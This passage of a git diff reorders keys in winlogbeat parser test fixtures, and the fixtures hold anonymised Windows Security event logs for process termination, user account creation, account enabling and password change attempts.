Termination\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:10:13.534Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un processus est termin\u00e9.\\n\\nSujet :\\n\\tID de s\u00e9curit\u00e9 :\\t\\tS-1-2-3\\n\\tNom du compte :\\t\\tACCOUNT_01$\\n\\tDomaine du compte :\\t\\tDOMAIN\\n\\tID d\u2019ouverture de session :\\t\\t0x3E7\\n\\nInformations sur le processus :\\n\\tID du processus :\\t0x1df8\\n\\tNom du processus :\\tC:\\\\Windows\\\\System32\\\\process.exe\\n\\t\u00c9tat de fin :\\t0x0\",\"host\":{\"name\":\"ACCOUNT_01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"Process Termination\",\"computer_name\":\"ACCOUNT_01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"SubjectLogonId\":\"0x3e7\",\"Status\":\"0x0\",\"ProcessId\":\"0x1df8\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT_01$\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\process.exe\"},\"process\":{\"thread\":{\"id\":620},\"pid\":4},\"event_id\":\"4689\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":1564712},\"@version\":\"1\"}", diff --git a/Beats/winlogbeat/tests/security_event_4720.json b/Beats/winlogbeat/tests/security_event_4720.json index 96e08b538..03a0543f5 100644 --- a/Beats/winlogbeat/tests/security_event_4720.json +++ b/Beats/winlogbeat/tests/security_event_4720.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}" + } }, "expected": { "message": "{\"tags\":[\"forwarded\",\"beats_input_raw_event\"],\"@version\":\"1\",\"host\":{\"name\":\"HOST01.reseau.company\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.8.0\"},\"agent\":{\"version\":\"7.12.1\",\"name\":\"AGENT\",\"hostname\":\"AGENT\",\"ephemeral_id\":\"12345678-abcd-ef90-1234-abcdef123456\",\"id\":\"aaaaaaaa-1111-bbbb-2222-cccccccccccc\",\"type\":\"winlogbeat\"},\"@timestamp\":\"2024-11-12T04:47:02.389Z\",\"user\":{\"domain\":\"RESEAU-COMPANY\",\"id\":\"S-1-2-3\",\"name\":\"user-name\"},\"event\":{\"outcome\":\"success\",\"action\":\"added-user-account\",\"category\":[\"iam\"],\"module\":\"security\",\"kind\":\"event\",\"code\":4720,\"provider\":\"Microsoft-Windows-Security-Auditing\",\"type\":[\"user\",\"creation\"],\"created\":\"2024-11-12T04:47:08.322Z\"},\"fields\":{\"env_AD\":\"AD Company\"},\"log\":{\"level\":\"information\"},\"related\":{\"user\":[\"user-name\",\"USER\"]},\"winlog\":{\"event_data\":{\"SubjectUserSid\":\"S-1-2-3\",\"SubjectDomainName\":\"RESEAU-COMPANY\",\"PrivilegeList\":\"-\",\"UserWorkstations\":\"-\",\"SubjectLogonId\":\"0x2a4b2040\",\"SidHistory\":\"-\",\"TargetUserName\":\"USER\",\"TargetDomainName\":\"RESEAU-COMPANY\",\"OldUacValue\":\"0x0\",\"SubjectUserName\":\"user-name\",\"UserPrincipalName\":\"USER@reseau.company\",\"HomeDirectory\":\"-\",\"AccountExpires\":\"%%1794\",\"SamAccountName\":\"USER\",\"ProfilePath\":\"-\",\"HomePath\":\"-\",\"DisplayName\":\"-\",\"PasswordLastSet\":\"%%1794\",\"AllowedToDelegateTo\":\"-\",\"ScriptPath\":\"-\",\"UserParameters\":\"-\",\"NewUacValue\":\"0x214\",\"LogonHours\":\"%%1793\",\"UserAccountControl\":[\"2082\",\"2084\",\"2089\"],\"NewUACList\":[\"LOCKOUT\",\"NORMAL_ACCOUNT\"],\"PrimaryGroupId\":\"513\",\"TargetSid\":\"S-1-2-3-4-5-6-7\"},\"record_id\":479720536,\"process\":{\"thread\":{\"id\":1940},\"pid\":612},\"opcode\":\"Info\",\"api\":\"wineventlog\",\"event_id\":4720,\"logon\":{\"id\":\"0x2a4b2040\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"task\":\"User Account Management\",\"computer_name\":\"HOST01.reseau.company\",\"channel\":\"Security\"}}", diff --git a/Beats/winlogbeat/tests/security_event_4722.json b/Beats/winlogbeat/tests/security_event_4722.json index 94bd16fdf..99debf8cf 100644 --- a/Beats/winlogbeat/tests/security_event_4722.json +++ b/Beats/winlogbeat/tests/security_event_4722.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:53:57.535Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4722\",\"created\":\"2024-11-12T08:53:58.677Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\"},\"message\":\"A user account was enabled.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\taccount-name\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A13C3FC\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3-4-5\\n\\tAccount Name:\\t\\tACC_NAME\\n\\tAccount Domain:\\t\\tDOMAIN\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"TargetUserName\":\"ACC_NAME\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"account-name\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a13c3fc\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3-4-5\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13042939152,\"event_id\":\"4722\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"12345678-abcd-90ef-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"AA-BB-CC-DD-EE-FF\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", diff --git a/Beats/winlogbeat/tests/security_event_4723.json b/Beats/winlogbeat/tests/security_event_4723.json index 34874fdfb..ac581308e 100644 --- a/Beats/winlogbeat/tests/security_event_4723.json +++ b/Beats/winlogbeat/tests/security_event_4723.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"pc01\",\"architecture\":\"x86_64\",\"id\":\"xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx\",\"name\":\"pc01\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2019 Standard\",\"build\":\"17763.6414\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + } }, "expected": { "message": "{\"@timestamp\":\"2024-11-12T08:59:04.757Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4723\",\"created\":\"2024-11-12T08:59:05.295Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\"},\"message\":\"An attempt was made to change an account's password.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x4A28EBBF\\n\\nTarget Account:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACCOUNT\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\nAdditional Information:\\n\\tPrivileges\\t\\t-\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"task\":\"User Account Management\",\"channel\":\"Security\",\"process\":{\"pid\":756,\"thread\":{\"id\":11608}},\"event_data\":{\"PrivilegeList\":\"-\",\"TargetUserName\":\"ACCOUNT\",\"SubjectDomainName\":\"DOMAIN\",\"SubjectUserName\":\"ACCOUNT\",\"TargetDomainName\":\"DOMAIN\",\"SubjectLogonId\":\"0x4a28ebbf\",\"SubjectUserSid\":\"S-1-2-3\",\"TargetSid\":\"S-1-2-3\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"PC01.domain.com\",\"record_id\":13043050897,\"event_id\":\"4723\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"PC01\",\"id\":\"123456-abcd-ef90-1234-abcdef123456\",\"ephemeral_id\":\"11111111-aaaa-2222-bbbb-333333333333\"},\"tags\":[\"Windows\",\"be